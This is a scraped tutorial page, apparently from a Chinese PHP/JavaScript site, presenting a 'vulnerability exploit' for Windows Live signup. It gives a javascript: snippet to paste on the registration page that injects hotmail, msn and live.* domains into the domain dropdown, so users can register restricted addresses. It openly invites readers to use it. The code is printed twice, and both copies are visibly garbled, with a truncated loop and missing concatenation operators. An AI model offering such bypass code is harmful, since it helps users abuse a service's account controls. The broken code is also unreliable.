Home >Web Front-end >JS Tutorial >Windows Live's @live.com domain name registration vulnerability exploit code_javascript skills

Windows Live's @live.com domain name registration vulnerability exploit code_javascript skills

WBOY
WBOYOriginal
2016-05-16 19:22:271810browse

Another @live.com domain name registration vulnerability of Windows Live has been discovered. Now we can add the @live.com address to the registration interface of Windows Live through a simple piece of JS code. Surprisingly, it is forced in The address can be successfully registered to the account! This is another excellent opportunity, everyone come and join us!

Update: Update the code to provide more domain names, including live.cn
The method is simple:

1. Enter this page: http://get.live.com/getlive/overview
2. Click the "Register Now" button
3. Paste it in the address bar Code in the following file and press Enter:

Copy the code The code is as follows:

javascript: function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById("idomain").options);r (d="live.");r(a = new Array("hotmail.com","hotmail.co.uk","msn.com",d "com",d "be",d "co. uk",d "de",d "fr",d "it",d "nl",d "cn")); for (i=0;i


After analysis:
Copy code The code is as follows:

javascript:
function r(q){}
function s(q){e[q] = new Option(a[q],a [q])};
r(e = document.getElementById("idomain").options);
r(d="live.");
r(a = new Array("hotmail .com","hotmail.co.uk","msn.com",d "com",d "be",d "co.uk",d "de",d "fr",d "it", d "nl",d "cn"));
for (i=0;i s(i )
}
alert("Success - additional domains added!");
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn